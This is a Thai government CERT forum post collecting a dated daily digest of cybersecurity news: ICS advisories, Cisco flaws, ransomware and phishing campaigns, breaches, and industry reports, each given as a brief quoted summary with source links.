NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ

    Cyber Threat Intelligence 07 November 2025

    Cyber Security News
    1
    1
    532
    โหลดโพสเพิ่มเติม
    • เก่าสุดไปยังใหม่สุด
    • ใหม่สุดไปยังเก่าสุด
    • Most Votes
    ตอบ
    • ตอบโดยตั้งกระทู้ใหม่
    เข้าสู่ระบบเพื่อตอบกลับ
    Topic นี้ถูกลบไปแล้ว เฉพาะผู้ใช้งานที่มีสิทธิ์ในการจัดการ Topic เท่านั้นที่จะมีสิทธิ์ในการเข้าชม
    • NCSA_THAICERTN
      NCSA_THAICERT
      แก้ไขล่าสุดโดย

      Industrial Sector

      • Advantech DeviceOn/iEdge
        "Successful exploitation of these vulnerabilities could result in a denial-of-service condition, remote code execution, or an attacker reading arbitrary files."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-310-01
      • ABB FLXeon Controllers
        "Successful exploitation of these vulnerabilities could allow an attacker to take remote control of the product, insert and run arbitrary code, and crash the device being accessed."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-310-03
      • Ubia Ubox
        "Successful exploitation of this vulnerability could allow an attacker to remotely view camera feeds or modify settings."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-310-02

      New Tooling

      • OpenGuardrails: A New Open-Source Model Aims To Make AI Safer For Real-World Use
        "When you ask a large language model to summarize a policy or write code, you probably assume it will behave safely. But what happens when someone tries to trick it into leaking data or generating harmful content? That question is driving a wave of research into AI guardrails, and a new open-source project called OpenGuardrails is taking a bold step in that direction."
        https://www.helpnetsecurity.com/2025/11/06/openguardrails-open-source-make-ai-safer/
        https://github.com/openguardrails/openguardrails

      Vulnerabilities

      • Cisco Warns Of New Firewall Attack Exploiting CVE-2025-20333 And CVE-2025-20362
        "Cisco on Wednesday disclosed that it became aware of a new attack variant that's designed to target devices running Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software releases that are susceptible to CVE-2025-20333 and CVE-2025-20362. "This attack can cause unpatched devices to unexpectedly reload, leading to denial-of-service (DoS) conditions," the company said in an updated advisory, urging customers to apply the updates as soon as possible."
        https://thehackernews.com/2025/11/cisco-warns-of-new-firewall-attack.html
        https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-radsupress-dos-8YF3JThh
        https://securityaffairs.com/184290/security/cisco-became-aware-of-a-new-attack-variant-against-secure-firewall-asa-and-ftd-devices.html
        https://www.theregister.com/2025/11/06/cisco_firewall_ongoing_attacks/
      • Critical Cisco UCCX Flaw Lets Attackers Run Commands As Root
        "Cisco has released security updates to patch a critical vulnerability in the Unified Contact Center Express (UCCX) software, which could enable attackers to execute commands with root privileges. The Cisco UCCX platform, described by the company as a "contact center in a box," is a software solution for managing customer interactions in call centers, supporting up to 400 agents. Tracked as CVE-2025-20354, this security flaw was discovered in the Java Remote Method Invocation (RMI) process of Cisco Unified CCX by security researcher Jahmel Harris, allowing unauthenticated attackers to execute arbitrary commands remotely with root permissions."
        https://www.bleepingcomputer.com/news/security/critical-cisco-uccx-flaw-lets-hackers-run-commands-as-root/
        https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cc-mult-vuln-gK4TFXSn
        https://www.securityweek.com/cisco-patches-critical-vulnerabilities-in-contact-center-appliance/
        https://www.helpnetsecurity.com/2025/11/06/cisco-fixes-critical-uccx-flaws-patch-asap-cve-2025-20358-cve-2025-20354/
      • Multi-Turn Attacks Expose Weaknesses In Open-Weight LLM Models
        "A new report has revealed that open-weight large language models (LLMs) have remained highly vulnerable to adaptive multi-turn adversarial attacks, even when single-turn defenses appear robust. The findings, published today by Cisco AI Defense, show that while isolated, one-off attack attempts frequently fail, persistent, multi-step conversations can achieve success rates exceeding 90% against most tested defenses."
        https://www.infosecurity-magazine.com/news/multi-turn-attacks-llm-models/
        https://arxiv.org/pdf/2511.03247

      Malware

      • An Unerring Spear: Cephalus Ransomware Analysis
        "Cephalus is a new ransomware group that first appeared in mid-June 2025. The group claims that they are motivated 100% by financial gain. Their main method of breaching organizations is by stealing credentials through Remote Desktop Protocol (RDP) accounts that do not have multi-factor authentication (MFA) enabled. Their operation is unique in that they have a form of customized ransomware that targets specific organizations, breaches them, exfiltrates their data, and then encrypts it. As of now, it is not yet known if they operate as Ransomware as a Service (RaaS) or if they have formed alliances with other ransomware groups. The name of the group comes from Cephalus, a character in Greek mythology who received an “unerring” spear from Artemis. This is seen as a sign of the group’s confidence in their success rate."
        https://asec.ahnlab.com/en/90878/
      • Ransomvibing Appears In VS Code Extensions
        "It was only a matter of time before ransomware techniques started to be included in VS Code extensions. One of the first overt examples was just discovered published to the Visual Studio Marketplace and it shows obvious signs of it being vibe coded. It utilizes GitHub as a command and control channel while also including exfiltration of encrypted files for potential extortion. This is not a sophisticated example, however, as the command and control server code was accidentally(?) included in the published extension's package along with decryption tools."
        https://secureannex.com/blog/ransomvibe/
        https://www.bleepingcomputer.com/news/security/ai-slop-ransomware-test-sneaks-on-to-vs-code-marketplace/
      • The Most Advanced ClickFix Yet?
        "ClickFix attacks have skyrocketed in the last year. This social engineering attack has established itself as a key part of the modern attacker’s toolkit, tricking victims into running malicious code on their device. As we showcased in our last webinar and at our threat briefing in London earlier this month, ClickFix is evolving fast, in terms of the web pages themselves, the delivery mechanisms by which they are sent to victims, and the nature of the payload and its execution. One particular example stood out to us in our research. So, is this the most advanced ClickFix you’ve seen?"
        https://pushsecurity.com/blog/the-most-advanced-clickfix-yet/
        https://www.bleepingcomputer.com/news/security/clickfix-malware-attacks-evolve-with-multi-os-support-video-tutorials/
      • Cavalry Werewolf Hacker Group Attacks Russian State Institutions
        "In July 2025, Doctor Web was contacted by a client from a government-owned organization within the Russian Federation with suspicions that its internal network had been compromised. This hypothesis derived from the fact that spam emails were detected as coming from one of their corporate email addresses. An investigation into the incident, conducted by our anti-virus laboratory, revealed that the institution had been subjected to a targeted attack by a hacker group, which our experts identified as Cavalry Werewolf. One of the attack’s goals was to collect confidential information as well as network configuration data."
        https://news.drweb.com/show/?i=15078&lng=en
        https://hackread.com/cavalry-werewolf-russia-government-shellnet-backdoor/
      • Phishing Campaigns “I Paid Twice” Targeting Booking.com Hotels And Customers
        "A Sekoia partner recently reported a phishing campaign targeting hospitality industry customers worldwide. The campaign was observed to involve either emails sent from a hotel’s compromised Booking.com account or messages distributed via WhatsApp. This activity proved particularly effective because the threat actor possessed customer data, including personal identifiers and reservation details, which further increased the credibility of the phishing attempts."
        https://blog.sekoia.io/phishing-campaigns-i-paid-twice-targeting-booking-com-hotels-and-customers/
        https://www.infosecurity-magazine.com/news/i-paid-twice-phishing-campaign/
      • Android Malware Steals Your Card Details And PIN To Make Instant ATM Withdrawals
        "The Polish Computer Emergency Response Team (CERT Polska) analyzed a new Android-based malware that uses NFC technology to perform unauthorized ATM cash withdrawals and drain victims’ bank accounts. Researchers found that the malware, called NGate, lets attackers withdraw cash from ATMs (Automated Teller Machines, or cash machines) using banking data exfiltrated from victims’ phones—without ever physically stealing the cards. NFC is a wireless technology that allows devices such as smartphones, payment cards, and terminals to communicate when they’re very close together. So, instead of stealing your bank card, the attackers capture NFC (Near Field Communication) activity on a mobile phone infected with the NGate malware and forward that transaction data to devices at ATMs. In NGate’s case the stolen data is sent over the network to the attackers’ servers rather than being relayed purely by radio."
        https://www.malwarebytes.com/blog/news/2025/11/android-malware-steals-your-card-details-and-pin-to-make-instant-atm-withdrawals
      • Sharing Is Scaring: The WhatsApp Screen-Sharing Scam You Didn’t See Coming
        "Scams and other threats that are doing the rounds on messaging apps like WhatsApp are a stark reminder of how easily even trusted platforms can be weaponized against us. One deceptive tactic that has gained traction recently involves tricking people into sharing their phone screens during a WhatsApp video call. The screen-sharing feature, available in WhatsApp since 2023, is increasingly being turned against the app’s users to steal their data, identities and money."
        https://www.welivesecurity.com/en/scams/sharing-is-scaring-whatsapp-screen-sharing-scam/

      Breaches/Hacks/Leaks

      • How a Ransomware Gang Encrypted Nevada Government's Systems
        "The State of Nevada has published an after-action report detailing how hackers breached its systems to deploy ransomware in August, and the actions taken to recover from the attack. The document is one of the few completely transparent technical report from a federal government in the U.S. on a cybersecurity incident, describing all the steps of the attacker and setting an example on how cybersecurity incidents should be handled. The incident impacted more than 60 state government agencies and disrupted essential services, from websites and phone systems to online platforms. 28 days later, without paying a ransom, the state recovered 90% of the impacted data that was required to restore affected services."
        https://www.bleepingcomputer.com/news/security/how-a-ransomware-gang-encrypted-nevada-governments-systems/
        https://www.documentcloud.org/documents/26218568-gto-statewide-cyber-event-aar-final/
        https://therecord.media/nevada-declined-ransom-breach
        https://www.bankinfosecurity.com/report-nevada-state-hackers-evaded-detection-for-months-a-29948
        https://www.securityweek.com/nevada-ransomware-attack-started-months-before-it-was-discovered-per-report/
      • Federally Qualified Health Center Reports Ransomware Breach
        "Central Jersey Medical Center, a federally qualified health center that partners with public schools in Newark, New Jersey, is notifying an undisclosed number of people of a data breach related to an August ransomware attack. Among its other healthcare services, the Perth Amboy, New Jersey-based medical center, which has been serving the region since 2001, operates school-based health centers in Newark that offer dental, medical and mental health services to both students and adults in the community."
        https://www.bankinfosecurity.com/federally-qualified-health-center-reports-ransomware-breach-a-29950
      • Clop Ransomware Group Claims The Breach Of The Washington Post
        "The Clop Ransomware group announced the hack of the prestigious American daily newspaper The Washington Post. The cybercrime group created a page for the university on its Tor data leak site and announced it will leak the stolen data soon. The group claimed the company was breached due to its neglect of security, despite its responsibility to protect customers. “The company doesn’t care about its customers, it ignored their security!!!”"
        https://securityaffairs.com/184304/cyber-crime/clop-ransomware-group-claims-the-breach-of-the-washington-post.html
      • U.S. Congressional Budget Office Hit By Suspected Foreign Cyberattack
        "The U.S. Congressional Budget Office (CBO) confirms it suffered a cybersecurity incident after a suspected foreign hacker breached its network, potentially exposing sensitive data. In a statement shared with BleepingComputer, CBO spokesperson Caitlin Emma confirmed the "security incident" and said the agency acted quickly to contain it. "The Congressional Budget Office has identified the security incident, has taken immediate action to contain it, and has implemented additional monitoring and new security controls to further protect the agency's systems going forward," Emma told BleepingComputer."
        https://www.bleepingcomputer.com/news/security/us-congressional-budget-office-hit-by-suspected-foreign-cyberattack/

      General News

      • An X-Ray Of Modern Networks: Understanding And Mitigating IoT Security Risks
        "We analyzed 10 million devices in over 700 organizations active in October 2025 on Forescout’s Device Cloud. In this dataset, two-thirds of devices across all organizations are no longer traditional IT (workstations, laptops, servers, hypervisors, etc.). They are either network devices, such as routers and firewalls which are already a favorite target or ‘extended internet of things’ (xIoT) devices, including operational technology (OT), internet of things (IoT) and medical devices (IoMT)."
        https://www.forescout.com/blog/an-x-ray-of-modern-networks-understanding-and-mitigating-iot-security-risks/
        https://www.helpnetsecurity.com/2025/11/06/enterprise-xiot-devices-risk/
      • Humans Built The Problem, AI Just Scaled It
        "Information moves across cloud platforms, personal devices, and AI tools, often faster than security teams can track it. Proofpoint’s 2025 Data Security Landscape report shows that most organizations faced data loss last year, usually caused by their own people. With AI agents part of daily operations, security leaders are confronting risks that come from users and from the systems acting on their behalf."
        https://www.helpnetsecurity.com/2025/11/06/proofpoint-organizations-data-loss-report/
      • Retailers Are Learning To Say No To Ransom Demands
        "Ransomware remains one of the biggest operational risks for retailers, but the latest data shows a shift in how these attacks unfold. Fewer incidents now lead to data encryption, recovery costs have dropped, and businesses are bouncing back faster. Yet attackers are demanding more money, and security teams are feeling the strain. These findings come from the State of Ransomware in Retail 2025 report by Sophos, based on a global survey of 361 retail IT and cybersecurity leaders whose organizations were hit by ransomware in the past year. The results point to progress in resilience but also show where retail security programs still fall short."
        https://www.helpnetsecurity.com/2025/11/06/sophos-retail-ransomware-recovery-report/
      • ESET APT Activity Report Q2 2025–Q3 2025
        "ESET APT Activity Report Q2 2025–Q3 2025 summarizes notable activities of selected advanced persistent threat (APT) groups that were documented by ESET researchers from April through September 2025. The highlighted operations are representative of the broader landscape of threats we investigated during this period. They illustrate the key trends and developments and contain only a small fraction of the cybersecurity intelligence data provided to customers of ESET APT reports."
        https://www.welivesecurity.com/en/eset-research/eset-apt-activity-report-q2-2025-q3-2025/
        https://thehackernews.com/2025/11/trojanized-eset-installers-drop.html
        https://therecord.media/russia-sandworm-grain-wipers
        https://www.bleepingcomputer.com/news/security/sandworm-hackers-use-data-wipers-to-disrupt-ukraines-grain-sector/
        https://www.bankinfosecurity.com/russias-destructive-wiper-attacks-on-ukraine-rise-again-a-29945
        https://www.helpnetsecurity.com/2025/11/06/global-apt-activity-report-2025/
      • Why Microsegmentation Is Just a Dream For Many IT Teams
        "Microsegmentation has long been touted as the gold standard and preferred strategy for restricting hackers' lateral movement. It locks down network traffic between applications, and reduces the blast radius for breaches. Vendors say it's transformative, but if you walk into most large enterprises, you'll will find it half-implemented."
        https://www.bankinfosecurity.com/microsegmentation-just-dream-for-many-teams-a-29951
      • ENISA Sectorial Threat Landscape - Public Administration
        "This ENISA sectorial threat landscape report provides an overview of the cyber threats faced by the public administration sector in the EU in 2024. Drawing on open-source information, the report highlights the key threats that impacted the sector and provides insights into typical threat types and key adversaries, to support the sector’s ongoing efforts to improve its cybersecurity posture, maturity and resilience."
        https://www.enisa.europa.eu/publications/enisa-sectorial-threat-landscape-public-administration
        https://www.infosecurity-magazine.com/news/hacktivistdriven-ddos-attacks/

      อ้างอิง
      Electronic Transactions Development Agency(ETDA) 1c24377f-09c2-4fab-870c-3a7d72956033-image.png

      1 การตอบกลับ คำตอบล่าสุด ตอบ คำอ้างอิง 0
      • First post
        Last post